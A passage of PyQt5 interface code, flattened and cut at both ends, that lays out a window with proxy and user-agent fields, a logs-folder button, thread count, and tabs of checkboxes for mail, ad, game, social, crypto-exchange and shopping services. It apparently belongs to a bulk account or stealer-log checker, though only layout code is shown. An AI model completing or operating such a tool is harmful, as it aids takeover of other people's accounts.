self.lineEdit_proxy.setGeometry(QtCore.QRect(10, 320, 331, 31)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.lineEdit_proxy.setFont(font) - self.lineEdit_proxy.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.lineEdit_proxy.setObjectName("lineEdit_proxy") - self.lineEdit_ua = QtWidgets.QLineEdit(self.centralwidget) - self.lineEdit_ua.setGeometry(QtCore.QRect(10, 360, 331, 31)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.lineEdit_ua.setFont(font) - self.lineEdit_ua.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.lineEdit_ua.setObjectName("lineEdit_ua") - self.checkBox_ua = QtWidgets.QCheckBox(self.centralwidget) - self.checkBox_ua.setGeometry(QtCore.QRect(440, 360, 81, 31)) - font = QtGui.QFont() - font.setFamily("MS Shell Dlg 2") - font.setPointSize(9) - font.setBold(True) - self.checkBox_ua.setFont(font) - self.checkBox_ua.setStyleSheet("color: #c8c8c8") - self.checkBox_ua.setObjectName("checkBox_ua") - self.label_2 = QtWidgets.QLabel(self.centralwidget) - self.label_2.setGeometry(QtCore.QRect(10, 740, 601, 51)) - self.label_2.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.label_2.setText("") - self.label_2.setObjectName("label_2") - self.pushButton = QtWidgets.QPushButton(self.centralwidget) - self.pushButton.setGeometry(QtCore.QRect(620, 740, 171, 51)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(12) - self.pushButton.setFont(font) - self.pushButton.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.pushButton.setObjectName("pushButton") - self.progressBar = QtWidgets.QProgressBar(self.centralwidget) - self.progressBar.setGeometry(QtCore.QRect(180, 750, 421, 31)) - self.progressBar.setStyleSheet("background-color: #181818;\n" -"border: 3px solid #363636;\n" -"color: #c8c8c8") - self.progressBar.setProperty("value", 24) - self.progressBar.setTextVisible(False) - self.progressBar.setOrientation(QtCore.Qt.Horizontal) - self.progressBar.setInvertedAppearance(False) - self.progressBar.setObjectName("progressBar") - self.pushButton_dir_logs = QtWidgets.QPushButton(self.centralwidget) - self.pushButton_dir_logs.setGeometry(QtCore.QRect(430, 280, 91, 31)) - self.pushButton_dir_logs.setStyleSheet("") - self.pushButton_dir_logs.setObjectName("pushButton_dir_logs") - self.pushButton_proxies_files = QtWidgets.QPushButton(self.centralwidget) - self.pushButton_proxies_files.setGeometry(QtCore.QRect(340, 320, 91, 31)) - self.pushButton_proxies_files.setStyleSheet("") - self.pushButton_proxies_files.setObjectName("pushButton_proxies_files") - self.pushButton_useragents_file = QtWidgets.QPushButton(self.centralwidget) - self.pushButton_useragents_file.setGeometry(QtCore.QRect(340, 360, 91, 31)) - self.pushButton_useragents_file.setStyleSheet("") - self.pushButton_useragents_file.setObjectName("pushButton_useragents_file") - self.textEdit_console = QtWidgets.QTextEdit(self.centralwidget) - self.textEdit_console.setGeometry(QtCore.QRect(10, 20, 781, 251)) - self.textEdit_console.setStyleSheet("background-color: #181818;\n" -"border: 3px solid #363636;\n" -"color: #c8c8c8") - self.textEdit_console.setObjectName("textEdit_console") - self.social_network_label = QtWidgets.QLabel(self.centralwidget) - self.social_network_label.setGeometry(QtCore.QRect(10, 740, 161, 51)) - font = QtGui.QFont() - font.setFamily("Furore") - font.setPointSize(10) - self.social_network_label.setFont(font) - self.social_network_label.setStyleSheet("") - self.social_network_label.setObjectName("social_network_label") - self.spinBox_thr = QtWidgets.QSpinBox(self.centralwidget) - self.spinBox_thr.setGeometry(QtCore.QRect(90, 750, 71, 31)) - font = QtGui.QFont() - font.setFamily("Impact") - font.setPointSize(10) - self.spinBox_thr.setFont(font) - self.spinBox_thr.setStyleSheet("QLineEdit,\n" -"QComboBox,\n" -"QDateTimeEdit,\n" -"QSpinBox,\n" -"QDoubleSpinBox {\n" -" color: #1de9b6;\n" -" background-color: #31363b;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 4px;\n" -" height: 32px;\n" -"}\n" -"\n" -"QWidget {\n" -" background-color: #232629;\n" -" color: #ffffff;\n" -"}\n" -"\n" -"QGroupBox,\n" -"QFrame {\n" -" background-color: #232629;\n" -" border: 2px solid #4f5b62;\n" -" border-radius: 4px;\n" -"}\n" -"\n" -"QRadioButton::indicator,\n" -"QCheckBox::indicator {\n" -" width: 16px;\n" -" height: 16px;\n" -" border: 2px solid #1de9b6;\n" -" border-radius: 0;\n" -" transform: rotate(45deg);\n" -" transform-origin: center;\n" -"}\n" -"\n" -"QRadioButton::indicator:checked,\n" -"QCheckBox::indicator:checked {\n" -" background-color: #1de9b6;\n" -" border-color: #1de9b6;\n" -"}\n" -"\n" -"QRadioButton::indicator:hover,\n" -"QCheckBox::indicator:hover {\n" -" border-color: rgba(29, 233, 182, 0.8);\n" -"}\n" -"\n" -"QRadioButton::indicator:checked:hover,\n" -"QCheckBox::indicator:checked:hover {\n" -" border-color: #1de9b6;\n" -"}") - self.spinBox_thr.setObjectName("spinBox_thr") - self.label_lgbt = QtWidgets.QLabel(self.centralwidget) - self.label_lgbt.setGeometry(QtCore.QRect(0, 0, 801, 5)) - self.label_lgbt.setText("") - self.label_lgbt.setScaledContents(True) - self.label_lgbt.setObjectName("label_lgbt") - self.comboBox_proxy = QtWidgets.QComboBox(self.centralwidget) - self.comboBox_proxy.setGeometry(QtCore.QRect(440, 320, 71, 21)) - font = QtGui.QFont() - font.setFamily("MS Sans Serif") - font.setPointSize(10) - self.comboBox_proxy.setFont(font) - self.comboBox_proxy.setStyleSheet("") - self.comboBox_proxy.setObjectName("comboBox_proxy") - self.comboBox_proxy.addItem("") - self.comboBox_proxy.addItem("") - self.comboBox_proxy.addItem("") - self.comboBox_proxy.addItem("") - self.stats_box = QtWidgets.QLabel(self.centralwidget) - self.stats_box.setGeometry(QtCore.QRect(530, 280, 261, 131)) - font = QtGui.QFont() - font.setFamily("Impact") - font.setPointSize(12) - self.stats_box.setFont(font) - self.stats_box.setStyleSheet("") - self.stats_box.setText("") - self.stats_box.setObjectName("stats_box") - self.inbox_tab_widget = QtWidgets.QTabWidget(self.centralwidget) - self.inbox_tab_widget.setGeometry(QtCore.QRect(10, 430, 781, 281)) - font = QtGui.QFont() - font.setFamily("Furore") - self.inbox_tab_widget.setFont(font) - self.inbox_tab_widget.setFocusPolicy(QtCore.Qt.TabFocus) - self.inbox_tab_widget.setContextMenuPolicy(QtCore.Qt.DefaultContextMenu) - self.inbox_tab_widget.setAutoFillBackground(False) - self.inbox_tab_widget.setStyleSheet("QTabWidget::pane { /* The tab widget frame */\n" -" border-top: 2px solid #000000;\n" -" position: absolute;\n" -" top: -0.5em;\n" -"}\n" -"\n" -"QTabWidget::tab-bar {\n" -" alignment: center;\n" -"}\n" -"\n" -"/* Style the tab using the tab sub-control. Note that\n" -" it reads QTabBar _not_ QTabWidget */\n" -"QTabBar::tab {\n" -" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n" -" stop: 0 #000000, stop: 0.4 #000000,\n" -" stop: 0.5 #000000, stop: 1.0 #000000);\n" -" border: 2px solid ;\n" -" selection-color: rgb(15, 255, 167);\n" -" border-bottom-color: #000000; /* same as the pane color */\n" -" border-top-left-radius: 12px;\n" -" border-top-right-radius: 12px;\n" -" min-width: 8ex;\n" -" padding: 8px;\n" -"}\n" -"\n" -"QTabBar::tab:selected, QTabBar::tab:hover {\n" -" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n" -" stop: 0 #000000, stop: 0.4 #000000,\n" -" stop: 0.5 #000000, stop: 1.0 #000000);\n" -"}\n" -"\n" -"QTabBar::tab:selected {\n" -" border-color: #00def2;\n" -" border-bottom-color: #00def2; /* same as pane color */\n" -"}") - self.inbox_tab_widget.setTabPosition(QtWidgets.QTabWidget.North) - self.inbox_tab_widget.setTabShape(QtWidgets.QTabWidget.Rounded) - self.inbox_tab_widget.setElideMode(QtCore.Qt.ElideNone) - self.inbox_tab_widget.setMovable(False) - self.inbox_tab_widget.setTabBarAutoHide(False) - self.inbox_tab_widget.setObjectName("inbox_tab_widget") - self.inbox_tab = QtWidgets.QWidget() - self.inbox_tab.setObjectName("inbox_tab") - self.widget = QtWidgets.QWidget(self.inbox_tab) - self.widget.setGeometry(QtCore.QRect(9, 10, 761, 221)) - self.widget.setObjectName("widget") - self.inbox_checkbox_gridlayout = QtWidgets.QGridLayout(self.widget) - self.inbox_checkbox_gridlayout.setContentsMargins(0, 0, 0, 0) - self.inbox_checkbox_gridlayout.setObjectName("inbox_checkbox_gridlayout") - self.gmail_inbox_checkbox = QtWidgets.QCheckBox(self.widget) - self.gmail_inbox_checkbox.setEnabled(False) - self.gmail_inbox_checkbox.setObjectName("gmail_inbox_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.gmail_inbox_checkbox, 0, 0, 1, 1) - self.yandex_checkbox = QtWidgets.QCheckBox(self.widget) - self.yandex_checkbox.setEnabled(False) - self.yandex_checkbox.setObjectName("yandex_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.yandex_checkbox, 0, 1, 1, 1) - self.yahoo_checkbox = QtWidgets.QCheckBox(self.widget) - self.yahoo_checkbox.setEnabled(False) - self.yahoo_checkbox.setObjectName("yahoo_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.yahoo_checkbox, 1, 0, 1, 1) - self.outlook_checkbox = QtWidgets.QCheckBox(self.widget) - self.outlook_checkbox.setEnabled(False) - self.outlook_checkbox.setObjectName("outlook_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.outlook_checkbox, 1, 1, 1, 1) - self.webmail_checkbox = QtWidgets.QCheckBox(self.widget) - self.webmail_checkbox.setEnabled(False) - self.webmail_checkbox.setObjectName("webmail_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.webmail_checkbox, 2, 0, 1, 1) - self.mailru_checkbox = QtWidgets.QCheckBox(self.widget) - self.mailru_checkbox.setEnabled(False) - self.mailru_checkbox.setObjectName("mailru_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.mailru_checkbox, 2, 1, 1, 1) - self.cpanel_checkbox = QtWidgets.QCheckBox(self.widget) - self.cpanel_checkbox.setEnabled(False) - self.cpanel_checkbox.setObjectName("cpanel_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.cpanel_checkbox, 3, 0, 1, 1) - self.office_checkbox = QtWidgets.QCheckBox(self.widget) - self.office_checkbox.setEnabled(False) - self.office_checkbox.setObjectName("office_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.office_checkbox, 3, 1, 1, 1) - self.inbox_tab_widget.addTab(self.inbox_tab, "") - self.ads_tab = QtWidgets.QWidget() - self.ads_tab.setObjectName("ads_tab") - self.widget1 = QtWidgets.QWidget(self.ads_tab) - self.widget1.setGeometry(QtCore.QRect(10, 10, 761, 211)) - self.widget1.setObjectName("widget1") - self.gridLayout_3 = QtWidgets.QGridLayout(self.widget1) - self.gridLayout_3.setContentsMargins(0, 0, 0, 0) - self.gridLayout_3.setObjectName("gridLayout_3") - self.bing_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.bing_ads_checkbox.setEnabled(False) - self.bing_ads_checkbox.setObjectName("bing_ads_checkbox") - self.gridLayout_3.addWidget(self.bing_ads_checkbox, 0, 0, 1, 1) - self.reddit_ads__checkbox = QtWidgets.QCheckBox(self.widget1) - self.reddit_ads__checkbox.setEnabled(False) - self.reddit_ads__checkbox.setObjectName("reddit_ads__checkbox") - self.gridLayout_3.addWidget(self.reddit_ads__checkbox, 0, 1, 1, 1) - self.ahref_checkbox = QtWidgets.QCheckBox(self.widget1) - self.ahref_checkbox.setEnabled(False) - self.ahref_checkbox.setObjectName("ahref_checkbox") - self.gridLayout_3.addWidget(self.ahref_checkbox, 0, 2, 1, 1) - self.snapchat_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.snapchat_ads_checkbox.setEnabled(False) - self.snapchat_ads_checkbox.setObjectName("snapchat_ads_checkbox") - self.gridLayout_3.addWidget(self.snapchat_ads_checkbox, 1, 0, 1, 1) - self.tinder_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.tinder_ads_checkbox.setEnabled(False) - self.tinder_ads_checkbox.setObjectName("tinder_ads_checkbox") - self.gridLayout_3.addWidget(self.tinder_ads_checkbox, 1, 1, 1, 1) - self.twitter_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.twitter_ads_checkbox.setEnabled(False) - self.twitter_ads_checkbox.setObjectName("twitter_ads_checkbox") - self.gridLayout_3.addWidget(self.twitter_ads_checkbox, 1, 2, 1, 1) - self.sem_rush_checkbox = QtWidgets.QCheckBox(self.widget1) - self.sem_rush_checkbox.setEnabled(False) - self.sem_rush_checkbox.setObjectName("sem_rush_checkbox") - self.gridLayout_3.addWidget(self.sem_rush_checkbox, 2, 0, 1, 1) - self.craigslist_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.craigslist_ads_checkbox.setEnabled(False) - self.craigslist_ads_checkbox.setObjectName("craigslist_ads_checkbox") - self.gridLayout_3.addWidget(self.craigslist_ads_checkbox, 3, 0, 1, 1) - self.facebookads__checkbox = QtWidgets.QCheckBox(self.widget1) - self.facebookads__checkbox.setObjectName("facebookads__checkbox") - self.gridLayout_3.addWidget(self.facebookads__checkbox, 3, 1, 1, 1) - self.microsoft_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.microsoft_ads_checkbox.setEnabled(False) - self.microsoft_ads_checkbox.setObjectName("microsoft_ads_checkbox") - self.gridLayout_3.addWidget(self.microsoft_ads_checkbox, 2, 2, 1, 1) - self.inbox_tab_widget.addTab(self.ads_tab, "") - self.game_tab = QtWidgets.QWidget() - self.game_tab.setObjectName("game_tab") - self.widget2 = QtWidgets.QWidget(self.game_tab) - self.widget2.setGeometry(QtCore.QRect(10, 10, 761, 201)) - self.widget2.setObjectName("widget2") - self.game_checkbox_gridlayout = QtWidgets.QGridLayout(self.widget2) - self.game_checkbox_gridlayout.setContentsMargins(0, 0, 0, 0) - self.game_checkbox_gridlayout.setObjectName("game_checkbox_gridlayout") - self.checkBox_steam = QtWidgets.QCheckBox(self.widget2) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_steam.setFont(font) - self.checkBox_steam.setStyleSheet("") - self.checkBox_steam.setObjectName("checkBox_steam") - self.game_checkbox_gridlayout.addWidget(self.checkBox_steam, 0, 0, 1, 1) - self.checkBox_pathofexile = QtWidgets.QCheckBox(self.widget2) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_pathofexile.setFont(font) - self.checkBox_pathofexile.setStyleSheet("") - self.checkBox_pathofexile.setObjectName("checkBox_pathofexile") - self.game_checkbox_gridlayout.addWidget(self.checkBox_pathofexile, 0, 1, 1, 1) - self.checkBox_roblox = QtWidgets.QCheckBox(self.widget2) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_roblox.setFont(font) - self.checkBox_roblox.setStyleSheet("") - self.checkBox_roblox.setObjectName("checkBox_roblox") - self.game_checkbox_gridlayout.addWidget(self.checkBox_roblox, 1, 0, 1, 1) - self.checkBox_battlenet = QtWidgets.QCheckBox(self.widget2) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_battlenet.setFont(font) - self.checkBox_battlenet.setStyleSheet("") - self.checkBox_battlenet.setObjectName("checkBox_battlenet") - self.game_checkbox_gridlayout.addWidget(self.checkBox_battlenet, 2, 0, 1, 1) - self.inbox_tab_widget.addTab(self.game_tab, "") - self.social_network_tab = QtWidgets.QWidget() - self.social_network_tab.setObjectName("social_network_tab") - self.layoutWidget = QtWidgets.QWidget(self.social_network_tab) - self.layoutWidget.setGeometry(QtCore.QRect(10, 10, 761, 231)) - self.layoutWidget.setObjectName("layoutWidget") - self.gridLayout = QtWidgets.QGridLayout(self.layoutWidget) - self.gridLayout.setContentsMargins(0, 0, 0, 0) - self.gridLayout.setObjectName("gridLayout") - self.checkBox_instagram = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_instagram.setFont(font) - self.checkBox_instagram.setStyleSheet("") - self.checkBox_instagram.setObjectName("checkBox_instagram") - self.gridLayout.addWidget(self.checkBox_instagram, 0, 0, 1, 1) - self.myspace_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.myspace_checkbox.setEnabled(False) - font = QtGui.QFont() - font.setFamily("Arial") - self.myspace_checkbox.setFont(font) - self.myspace_checkbox.setObjectName("myspace_checkbox") - self.gridLayout.addWidget(self.myspace_checkbox, 2, 2, 1, 1) - self.reddit_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.reddit_checkbox.setEnabled(False) - self.reddit_checkbox.setObjectName("reddit_checkbox") - self.gridLayout.addWidget(self.reddit_checkbox, 1, 2, 1, 1) - self.linkedin_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.linkedin_checkbox.setEnabled(False) - self.linkedin_checkbox.setObjectName("linkedin_checkbox") - self.gridLayout.addWidget(self.linkedin_checkbox, 2, 3, 1, 2) - self.checkBox_discord = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_discord.setFont(font) - self.checkBox_discord.setStyleSheet("") - self.checkBox_discord.setObjectName("checkBox_discord") - self.gridLayout.addWidget(self.checkBox_discord, 2, 1, 1, 1) - self.kick_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.kick_checkbox.setObjectName("kick_checkbox") - self.gridLayout.addWidget(self.kick_checkbox, 5, 0, 1, 1) - self.checkBox_facebook_ads = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_facebook_ads.setFont(font) - self.checkBox_facebook_ads.setStyleSheet("") - self.checkBox_facebook_ads.setObjectName("checkBox_facebook_ads") - self.gridLayout.addWidget(self.checkBox_facebook_ads, 0, 2, 1, 1) - self.checkBox_tiktok = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_tiktok.setFont(font) - self.checkBox_tiktok.setStyleSheet("") - self.checkBox_tiktok.setObjectName("checkBox_tiktok") - self.gridLayout.addWidget(self.checkBox_tiktok, 2, 0, 1, 1) - self.twitch_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.twitch_checkbox.setEnabled(False) - self.twitch_checkbox.setObjectName("twitch_checkbox") - self.gridLayout.addWidget(self.twitch_checkbox, 0, 3, 1, 2) - self.pintrest_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.pintrest_checkbox.setEnabled(False) - self.pintrest_checkbox.setObjectName("pintrest_checkbox") - self.gridLayout.addWidget(self.pintrest_checkbox, 1, 0, 1, 1) - self.checkBox_youtube = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_youtube.setFont(font) - self.checkBox_youtube.setStyleSheet("") - self.checkBox_youtube.setObjectName("checkBox_youtube") - self.gridLayout.addWidget(self.checkBox_youtube, 0, 1, 1, 1) - self.vimeo_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.vimeo_checkbox.setObjectName("vimeo_checkbox") - self.gridLayout.addWidget(self.vimeo_checkbox, 5, 1, 1, 1) - self.rumble_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.rumble_checkbox.setEnabled(False) - self.rumble_checkbox.setObjectName("rumble_checkbox") - self.gridLayout.addWidget(self.rumble_checkbox, 5, 2, 1, 1) - self.localsapp_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.localsapp_checkbox.setEnabled(False) - self.localsapp_checkbox.setObjectName("localsapp_checkbox") - self.gridLayout.addWidget(self.localsapp_checkbox, 5, 3, 1, 1) - self.snapchat_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.snapchat_checkbox.setEnabled(False) - self.snapchat_checkbox.setObjectName("snapchat_checkbox") - self.gridLayout.addWidget(self.snapchat_checkbox, 1, 3, 1, 1) - self.patreon_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.patreon_checkbox.setEnabled(False) - self.patreon_checkbox.setObjectName("patreon_checkbox") - self.gridLayout.addWidget(self.patreon_checkbox, 5, 4, 1, 1) - self.checkBox_netflix = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_netflix.setFont(font) - self.checkBox_netflix.setStyleSheet("") - self.checkBox_netflix.setObjectName("checkBox_netflix") - self.gridLayout.addWidget(self.checkBox_netflix, 1, 1, 1, 1) - self.checkBox_vk = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_vk.setFont(font) - self.checkBox_vk.setStyleSheet("") - self.checkBox_vk.setObjectName("checkBox_vk") - self.gridLayout.addWidget(self.checkBox_vk, 1, 4, 1, 1) - self.inbox_tab_widget.addTab(self.social_network_tab, "") - self.crypto_wallets_tab = QtWidgets.QWidget() - self.crypto_wallets_tab.setObjectName("crypto_wallets_tab") - self.widget3 = QtWidgets.QWidget(self.crypto_wallets_tab) - self.widget3.setGeometry(QtCore.QRect(10, 10, 761, 221)) - self.widget3.setObjectName("widget3") - self.gridLayout_6 = QtWidgets.QGridLayout(self.widget3) - self.gridLayout_6.setContentsMargins(0, 0, 0, 0) - self.gridLayout_6.setObjectName("gridLayout_6") - self.checkBox_coinbase = QtWidgets.QCheckBox(self.widget3) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_coinbase.setFont(font) - self.checkBox_coinbase.setStyleSheet("") - self.checkBox_coinbase.setObjectName("checkBox_coinbase") - self.gridLayout_6.addWidget(self.checkBox_coinbase, 0, 0, 1, 1) - self.checkBox_kryptex = QtWidgets.QCheckBox(self.widget3) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_kryptex.setFont(font) - self.checkBox_kryptex.setStyleSheet("") - self.checkBox_kryptex.setObjectName("checkBox_kryptex") - self.gridLayout_6.addWidget(self.checkBox_kryptex, 0, 1, 1, 1) - self.checkBox_hitbtc = QtWidgets.QCheckBox(self.widget3) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_hitbtc.setFont(font) - self.checkBox_hitbtc.setStyleSheet("") - self.checkBox_hitbtc.setObjectName("checkBox_hitbtc") - self.gridLayout_6.addWidget(self.checkBox_hitbtc, 1, 0, 1, 1) - self.checkBox_freebitcoin = QtWidgets.QCheckBox(self.widget3) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_freebitcoin.setFont(font) - self.checkBox_freebitcoin.setStyleSheet("") - self.checkBox_freebitcoin.setObjectName("checkBox_freebitcoin") - self.gridLayout_6.addWidget(self.checkBox_freebitcoin, 2, 0, 1, 1) - self.inbox_tab_widget.addTab(self.crypto_wallets_tab, "") - self.shopping_tab = QtWidgets.QWidget() - self.shopping_tab.setObjectName("shopping_tab") - self.layoutWidget1 = QtWidgets.QWidget(self.shopping_tab) - self.layoutWidget1.setGeometry(QtCore.QRect(10, 10, 731, 211)) - self.layoutWidget1.setObjectName("layoutWidget1") - self.gridLayout_2 = QtWidgets.QGridLayout(self.layoutWidget1) - self.gridLayout_2.setContentsMargins(0, 0, 0, 0) - self.gridLayout_2.setObjectName("gridLayout_2") - self.checkBox_amazon = QtWidgets.QCheckBox(self.layoutWidget1) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_amazon.setFont(font) - self.checkBox_amazon.setStyleSheet("") - self.checkBox_amazon.setObjectName("checkBox_amazon") - self.gridLayout_2.addWidget(self.checkBox_amazon, 0, 0, 1, 1) - self.ebay_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.ebay_checkbox.setEnabled(False) - self.ebay_checkbox.setObjectName("ebay_checkbox") - self.gridLayout_2.addWidget(self.ebay_checkbox, 0, 1, 1, 1) - self.airbnb_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.airbnb_checkbox.setEnabled(False) - self.airbnb_checkbox.setObjectName("airbnb_checkbox") - self.gridLayout_2.addWidget(self.airbnb_checkbox, 0, 2, 1, 1) - self.envato_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.envato_checkbox.setEnabled(False) - self.envato_checkbox.setObjectName("envato_checkbox") - self.gridLayout_2.addWidget(self.envato_checkbox, 0, 3, 1, 1) - self.flipkart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.flipkart_checkbox.setEnabled(False) - self.flipkart_checkbox.setObjectName("flipkart_checkbox") - self.gridLayout_2.addWidget(self.flipkart_checkbox, 0, 4, 1, 1) - self.checkBox_funpay = QtWidgets.QCheckBox(self.layoutWidget1) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_funpay.setFont(font) - self.checkBox_funpay.setStyleSheet("") - self.checkBox_funpay.setObjectName("checkBox_funpay") - self.gridLayout_2.addWidget(self.checkBox_funpay, 1, 0, 1, 1) - self.kleinanzeigen_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - 